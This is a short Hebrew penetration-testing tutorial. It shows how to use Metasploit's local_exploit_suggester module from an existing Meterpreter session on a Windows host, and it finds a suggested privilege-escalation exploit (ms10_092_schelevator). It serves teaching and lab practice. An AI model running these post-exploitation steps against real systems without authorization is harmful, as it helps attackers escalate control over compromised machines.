Home אבטחת מידעPenetration Testing - Offense Post Exploitation | ביצוע סריקת Exploits בתחנה ע”י Metasploit

Post Exploitation | ביצוע סריקת Exploits בתחנה ע”י Metasploit

by Tal Ben Shushan 27/01/2018 0 comment
Post Exploitation | ביצוע סריקת Exploits בתחנה ע”י Metasploit
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

Post Exploitation | ביצוע סריקת Exploits בתחנה ע”י Metasploit


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


פיצ’ר נוסף שקיים ב Metasploit הוא היכולת לסרוק את התחנה, לבדוק אילו Exploits יכולים לרוץ ובכך לעזור לנו ל”תקוף” את המערכת

דרוש:

  • Kali
  • Windows 7/8/10
  • גישת Meterpreter אל התחנה(קיימים מדריכים באתר)

כעת נרשום background על מנת להכניס את ה Session ברקע, כדי שנוכל להגדיר את ה Exploit

meterpreter > background

כעת נשתמש ב Exploit

msf exploit > use post/multi/recon/local_exploit_suggester

כעת נבדוק מה ה session שלנו

msf exploit (local_exploit_suggester) > sessions

ה ID שלו זה 4, לכן

msf exploit (local_exploit_suggester) > set session 4

כעת נריץ אותו

msf exploit (local_exploit_suggester) > run

מעולה! ניתן להבחין ש

exploit/windows/local/ms10_092_schelevator

ניתן להשתמש בו על התחנה

מאמרים קשורים

Leave a Comment